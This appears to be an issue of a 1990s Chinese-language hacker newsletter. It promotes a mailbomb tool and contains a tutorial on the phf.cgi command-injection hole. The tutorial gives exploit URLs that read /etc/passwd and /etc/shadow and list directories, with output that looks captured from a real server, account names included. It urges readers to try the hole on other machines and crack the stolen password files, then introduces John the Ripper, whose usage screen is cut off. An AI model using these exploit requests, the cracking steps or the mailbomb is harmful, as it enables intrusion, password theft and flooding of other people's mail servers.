在昨天, 我們的首頁造訪人數破萬了~~ 應該是增加了很多人, 而不是有人故意灌水的吧? 希望新
朋友們能喜歡我們的內容, 有人問到: 有沒有跟我們首頁性質相近的中文站台? 很遺憾的是目前
我還沒有找到.... 看得到的大多是軟體, 註冊機之類的破解站台. 如果你也有這樣的站台的話,
歡迎你寫信給我們進行連結. 有很多網友報怨檔案抓不下來, 先前我們已經盡了很大的努力將檔
案放在國內 Server 中, 我想, 由 HiNet 連這邊應該很快吧? 還是水管塞住的問題?? 如果有人
的位址在 .edu.tw 附近的, 歡迎來信要求 Mirror~~ 我很樂意將檔案 Mirror 給你, 讓其它網
友更方便取這些檔案.

好久沒有再弄出一些文章出來了, 不過最近倒是回了蠻多關於 Hacker 方面的問題, 也收到了許多
的回應信件, 有許多的問題在這一篇文章中都會有答案, 甚至到現在還有很多的網友們詢問甚麼
是 shadow password 的, 請各位多翻翻以前的文章吧!! 在 CGI Holes 方面的問題也很多, 所以在
這一篇之後我會找個時間寫一寫 System Holes #2 來讓大家對一些網路上常見的程式漏洞有一些基
本的認識.

最近有許多軟體更新了, 最令我們注意的當然就是 NT 4.0 囉, 因為它的更新肯定會帶來很多的
人更新系統, 當然這樣先進的作業系統我們還是很期待有人會很快的將它的 Bugs 找出來的啦!!
UpYours 這套重量級的 MailBomb 也出現的新的版本, 這次的 V4.0 Beta 2 經試用後發現實在是
改進了很多, 但是相對的危險性也跟著提高, 其改用 Delphi 來設計, 使得安裝更為方便, 不過
美中不足的是 beta2 的版本有些功能尚未改好, 光看到功能就讓人哈翻了~~:) 這套 beta2 的版
本目前在我們的首頁上可以找得到, 相信它的正式版本很快就會完成~~

關於 MailBomb: 我們的首頁上所提供的 MailBomb 僅供大家作為測試用, 請勿拿來開玩笑或是對別人
的信箱進行轟炸, 日前此類事件造成某些的 ISP 當機, 慎至還有導致 Mail Server 記憶體不足的情
況 (哪個人這麼狠??), 我們也發現最近網路越來越慢了, 因為水管上積了太多要跟我們搶寬度的垃圾
信件. 請大家以學習的心來使用這些 Bombs... 不要沒事就拿來炸人好嗎 ?? Then enjoy new one~

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
[CGI Hole (phf.cgi) 的延伸]

這次的主題想了好久, 一直都沒有想到, 不過日前有一個屋漏偏逢連夜雨的某國營事業, 在幾經下X雨
及漏X的風波之後, 在他們的主機上發現了很好玩的狀況, 原本我們在使用 phf.cgi 來抓 /etc/passwd
的時候, 在 Browser 的 Location 中是下:

   http://www.somewhere.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

Query Results

/usr/local/bin/ph -m alias=x /bin/cat /etc/passwd

root:x:0:1:0000-Admin(0000):/:/sbin/sh
daemon:x:1:1:0000-Admin(0000):/:
bin:x:2:2:0000-Admin(0000):/usr/bin:
sys:x:3:3:0000-Admin(0000):/:
adm:x:4:4:0000-Admin(0000):/var/adm:
lp:x:71:8:0000-lp(0000):/usr/spool/lp:
smtp:x:0:0:mail daemon user:/:
uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:
nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
nadm:x:45:2::/usr/bin:/sbin/sh
iuucp:x:46:5::/usr/lib/uucp/uucico:/sbin/sh
nobody:x:60001:60001:uid no body:/:
noaccess:x:60002:60002:uid no access:/:
gopher:x:100:1::/usr/local/bin:/usr/local/bin/GopherUserScript
news:x:105:100::/usr/local/etc/innd:/usr/lib/rsh
ftp:x:106:101:Anonymous FTP:/export/ftp:/bin/false
hanshin:x:109:1::/home1/hanshin:/usr/lib/rsh
dayeh:x:110:1::/home1/dayeh:/usr/lib/rsh
ming:x:133:1::/home1/ming:/usr/bin/ksh
charlesl:x:139:1::/home1/charlesl:/usr/lib/rsh
iiimail:x:142:6::/home/iiimail:/usr/lib/rsh
charles.lo:x:156:1::/home1/charles.lo:/usr/lib/rsh
webmaster:x:161:1::/home1/webmaster:/usr/lib/rsh
mark:x:171:1::/home1/mark:/usr/lib/rsh
jcteam:x:172:1::/home1/jcteam:/usr/lib/rsh
ibgchen:x:224:1::/home1/ibgchen:/usr/lib/rsh

但是如果沒有, 或是 shadow 的話, 你可能會接著試:

   http://www.somewhere.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/shadow

Query Results

/usr/local/bin/ph -m alias=x /bin/cat /etc/shadow

但是有時候雖然 phf.cgi 這個程式的漏洞沒有被補上, 還是有很多的機器不理會這個指令, 不過當這
個指令生效, 但是你看到的卻是一個 shadow 過的 passwd 的時候, 請不要灰心, 因為這台機器已經在
你的手中了, 為甚麼呢 ?? 我們來玩看看一些簡單的 Unix shell command 你就會知道了~~

   http://www.somewhere.com/cgi-bin/phf?Qalias=x%0a/bin/ls%20-l%20-a%20/etc

Query Results

/usr/local/bin/ph -m alias=x /bin/ls -l -a /etc


total 466
-rw-r--r--   1 root     root           38 May  2  1996 #etcnamed.boot#
-rw-r--r--   1 root     root        20579 May  1  1996 #sendmail.cf#
drwxr-xr-x  11 root     root         2048 Apr 17 13:07 .
drwxr-xr-x  24 root     root         1024 Mar 26 08:16 ..
-rw-r--r--   1 root     root         2167 Aug 24  1995 DIR_COLORS
-rw-r--r--   1 root     root           15 May  1  1996 HOSTNAME
-rw-r--r--   1 root     root            4 Feb 24  1993 NETWORKING
-rw-r--r--   1 root     root           48 Dec 30  1994 NNTP_INEWS_DOMAIN
-rw-r--r--   1 root     root            0 May 13  1994 at.deny
drwxr-xr-x   2 root     root         1024 Apr 11  1996 backups
-rw-r--r--   1 root     root         1212 Jul 10  1993 bootptab
-rw-r--r--   1 root     root            0 Feb 15  1994 csh.cshrc
-rw-r--r--   1 root     root          893 Apr 12  1996 csh.login
drwxr-xr-x   2 root     root         1024 Apr 16  1996 default
-rw-r--r--   1 root     root          154 Aug 21  1994 exports
-rw-r--r--   1 root     root            0 May 13  1995 fastboot
-rw-r--r--   1 root     root         1118 Jan 28  1994 fdprm
drwxr-xr-x   2 root     root         1024 Apr 12  1996 fs
-rw-r--r--   1 root     root          250 Dec  9 19:19 fstab
-rw-r--r--   1 root     root          242 Dec  5 13:55 fstab~
-rw-r--r--   1 root     root         1915 Jan 27 07:46 ftpaccess
-rw-r--r--   1 root     root          368 Aug  1  1994 ftpconversions
-rw-r--r--   1 root     root            0 Aug  9  1994 ftpgroups
-rwxr-xr-x   1 root     root           50 May  1  1996 ftponly
-rw-r--r--   1 root     root          501 Apr 26  1996 ftpusers
-rw-r--r--   1 root     root           76 Aug 21  1994 gateways
-rw-r--r--   1 root     root          669 May 19  1994 gettydefs
-rw-r--r--   1 root     root          291 Jun  6  1996 group
-rw-r--r--   1 root     root           27 Jul  7  1994 host.conf
-rw-r--r--   1 root     root          628 Jul 12  1996 hosts
-rw-r--r--   1 root     root          600 Jan  6 10:18 hosts.allow
-rw-r--r--   1 root     root          341 May  9  1996 hosts.deny
-rw-r--r--   1 root     root          313 Mar 16  1994 hosts.equiv
-rw-r--r--   1 root     root          302 Sep 23  1993 hosts.lpd
-rw-r--r--   1 root     root          653 Apr 24  1996 hosts~
lrwxrwxrwx   1 root     root            1 Apr 12  1996 inet -> .
-rw-r--r--   1 root     root         3677 Jan  6 10:20 inetd.conf
-rw-r--r--   1 root     root         3664 Apr 23  1996 inetd.conf~
-rw-r--r--   1 root     root         2351 Apr 18  1996 inittab
-rw-r--r--   1 root     root         2046 Jul 28  1994 inittab.gettyps.sample
-rw-r--r--   1 root     root           27 Apr 17 12:43 issue
-rw-r--r--   1 root     root            3 Apr 17 12:43 klogd.pid
-rw-r--r--   1 root     root         1223 Apr 17 12:43 ld.so.cache
-rw-r--r--   1 root     root           71 Aug 14  1995 ld.so.conf
drwxr-xr-x   2 root     root         1024 Apr 12  1996 lilo
-rw-r--r--   1 root     root          479 Apr 13  1996 lilo.conf
-rw-r--r--   1 root     root          479 Apr 13  1996 lilo.conf.bak
-rw-r--r--   1 root     root          266 Apr 17 12:42 localtime
-rw-r--r--   1 root     root        76873 Oct 17  1995 magic
-r--r--r--   1 root     root          105 May  8  1994 mail.rc
-rw-r--r--   1 root     root           14 Apr 17 12:43 motd
drwxr-xr-x   2 root     root         1024 Aug  1  1994 msgs
-rw-r--r--   1 root     root          151 Apr 17 20:43 mtab
-rw-r--r--   1 root     root          833 Jun 29  1994 mtools
-r--r--r--   1 root     root          974 Apr 17 11:48 named.boot
-r--r--r--   1 root     root         2568 May  2  1996 named.boot,v
-r--r--r--   1 root     root          764 Mar  8 16:54 named.boot.v1
-r--r--r--   1 root     root          813 Mar 17 08:45 named.boot.v2
-r--r--r--   1 root     root          521 Apr 18  1996 named.boot.~1.3~
-r--r--r--   1 root     root          566 Apr 19  1996 named.boot.~1.4~
-r--r--r--   1 root     root          566 Apr 19  1996 named.boot.~1.5~
-r--r--r--   1 root     root          707 Mar  5 08:32 named.boot.~1.6~
-rw-r--r--   1 root     root          566 Apr 19  1996 named.boot~
-rw-r--r--   1 root     root          235 May  1  1996 networks
-rw-r--r--   1 root     root          237 Apr 24  1996 networks~
-rw-r--r--   1 root     root            0 May  8  1995 nntpserver
-rw-r--r--   1 root     root           36 Sep 12  1994 organization
-rw-r--r--   1 root     root         1727 Apr 17 13:07 passwd
-r--r--r--   1 root     root         1662 Apr 17 13:06 passwd-
-rw-r--r--   1 root     root         1715 Apr 17 13:06 passwd.OLD
-rw-r--r--   1 root     root         1494 Feb 12 14:22 passwd.old
-rw-r--r--   1 root     root         1354 Jun  6  1996 passwd~
drwxr-xr-x   2 root     root         1024 Jul  9  1994 ppp
-rw-r--r--   1 root     root         2240 May 20  1994 printcap
-rw-r--r--   1 root     root         1083 Apr 12  1996 profile
-rw-r--r--   1 root     root          595 Aug 21  1994 protocols
drwxr-xr-x   2 root     root         1024 Jan  3 23:59 rc.d
-rw-r--r--   1 root     root           41 May  1  1996 resolv.conf
-rw-r--r--   1 root     root           65 Jan 31  1996 resolv.conf~
-rw-r--r--   1 root     root          743 Aug  1  1994 rpc
-rw-r--r--   1 root     root           87 Jun  6  1996 securetty
-r--r--r--   1 root     root        20579 May  1  1996 sendmail.cf
-r--r--r--   1 root     root        21332 May  1  1996 sendmail.cf,v
-rw-r--r--   1 root     root        20541 Apr 13  1996 sendmail.cf~
-rw-r--r--   1 root     root          408 Apr 25 17:17 sendmail.st
-rw-r--r--   1 root     root         5575 Aug  1  1994 services
-rw-r--r--   1 root     root           68 Jun  6  1996 shells
drwxr-xr-x   3 root     root         1024 Nov 13  1994 skel
-rw-r--r--   1 root     root          314 Jan 10  1995 slip.hosts
-rw-r--r--   1 root     root          342 Jan 10  1995 slip.login
-rw-r--r--   1 root     root          455 Aug  1  1994 snooptab
-rw-------   1 root     users         524 Jul 18  1996 ssh_host_key
-rw-r--r--   1 root     users         327 Jul 18  1996 ssh_host_key.pub
-rw-------   1 root     users         512 Mar 10 09:03 ssh_random_seed
-rw-r--r--   1 root     users         607 Jul 18  1996 sshd_config
-rw-r-----   1 root     root          501 Apr 26  1996 syslog.conf
-rw-r--r--   1 root     root            3 Apr 17 12:43 syslog.pid
-rw-r--r--   1 root     root       183942 Aug  9  1995 termcap
-rw-r--r--   1 root     root          126 Nov 24  1993 ttys
lrwxrwxrwx   1 root     root           13 Apr 12  1996 utmp -> /var/adm/utmp
drwxr-xr-x   2 root     root         1024 Aug 25  1995 vga
lrwxrwxrwx   1 root     root           13 Apr 12  1996 wtmp -> /var/adm/wtmp
-rw-r--r--   1 root     root           76 May  8  1995 yp.conf.example
lrwxrwxrwx   1 root     root            7 Apr 12  1996 zprofile -> profile

上面的 %20 所代表的是 [Space] 也就是空白鍵啦! 那上面這個 Location 就如同我們已經 Telnet 到
這台機器上, 下了: ls -l -a /etc 這個指令一樣, 嗯... 也就是說....$^^*^$@@#
OK! 當你抓 /etc/passwd 所抓到的是 shadow 過的 passwd 檔, 你一定會要抓真正的 shadow 檔來作
"配對" 的動作... 所以呢, 下了 ls 指令來找找看到底真的 shadow 是藏在哪裡, 當然你可以看的不
只是 /etc 這個目錄, 任何目錄你都可以看, 當然你可以使用的也不只是 cat 及 ls 這兩個指令, 你
可以用更多的指令~~ 那麼還有甚麼作不到的呢 ??? 我想可能還是有很多哩~~ 因為 phf.cgi 好像只
把你所下的指令丟給 shell 後直接攔下它輸出的結果, 也就是如果像是 /bin/passwd userid 這樣的
指令就不能用~ 因為它會要等你輸入下一個字串~~ 除非先寫入一個檔案, 然後用來代入 "<".. 嗯..
最近很忙, 沒有空作這些無聊事, 不過 phf.cgi 還真的蠻好玩的, 我已經試了好幾台機器都可以看到
文件內容及檔案, 目錄... 當然~ 沒有破壞就是了~~

經過這樣的說明, 你是不是有些 Idea ?? 還是記起以前有試過其它的機器的 phf.cgi 也可以這樣子
玩的 ?? 嗯~ 再連過去玩玩看吧! 發揮一下你的想像力~~ /etc/passwd 很容易就可以得手的喔~~ 對
了~ 不要亂搞政府機關 or 你們的學校啦!!~~
-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
[Crack 工具介紹] John the Ripper V1.4 [Size:743K]

記得先前一直介紹大家使用 CJack V1.4 來破解密碼檔, 那是因為它 "夠快", 在 Encrypt 的速度及
比對的速度上實在快了很多, 但是之後由於很多網友的作業環境是在 Windows 95 之下, 所以 Jack
不能跑, 我們就介紹大家使用 John the Ripper V1.1 這個 Passwrod Cracker~ 現在這套 Cracker
出了新的版本了, 經過我們的試用覺得應該好好的為它介紹一番, 原來一直聲稱速度上比 CJack14
還要快的 John, 經過實際上的測試, 總感覺速度沒有 Jack 來得快, 雖然作者聲稱是因為他們這支
程式是以 486 機器作最佳化的, 在 386 上跑起來會比較慢, 但是舊的 V1.1 實在是比 Jack 還要慢
這也是大家都看得到的事實.

而 1.4 版在 EnCrypt 上實在是下了點功夫, 也對 Win32 版本有了支援, 當你下載解開後會發現裡
面有 DOS.ZIP WIN32.ZIP SOURCE.TGZ 這三個檔, 分別是在 DOS 下使用的版本, Win95,NT 下使用的
版本及 Unix 下使用的版本, 這時針對你所運用的作業環境作個選擇, 將檔案解開即可直接使用.

你還要再解開 COMMON.ZIP(共用檔) 及 DOC.ZIP(說明檔), 經過測試速度上明顯提升很多, 但是我不
敢講它比 Jack 要快多少, 至少在我的 Pentium 133 的機器上跑起來覺得差不多, 也沒有誰比較快
誰比較慢的感覺~~ 不過以這樣的檔案大小 (7xxK) 能同時包含三種作業系統, 實在是不錯的選擇!!

當然這個程式裡面只含了一個小小的字典檔供你測試, 想要發揮它最大的效能還是先要有一個不錯的
字典檔, 但是新的版本中可以讓你設定自動產生序數及字串比對(之前的好像也有吧?), 至於如何操
作, 我想他跟 Jack 及前一版本的操作方法相同, 就不用再多作介紹了~~ 以下是它的執行畫面:

John the Ripper  Version 1.4  Copyright (c) 1996,97 by Solar Designer

Usage: john [flags] [passwd files]
Flags: -pwfile:[,..]     specify passwd file(s)
       -wordfile: -stdin wordlist mode, read words from  or stdin
       -rules                  enable rules for wordlist mode
       -incremental[:]   incremental mode [using john.ini entry ]
       -single                 single crack mode
       -external:        external mode, using john.ini entry 
       -restore[:]       restore session [from ]
       -makechars:       make a charset,  will be overwritten
       -show                   show cracked passwords
       -test                   perform a benchmark
       -users:[,..] crack this (these) user(s) only
       -shells:[!][,..] crack users with this (these) shell(s) only
       -salts:[!]       crack salts with at least  accounts only
       -lamesalts              assume plaintext passwords were used as salts
       -timeout: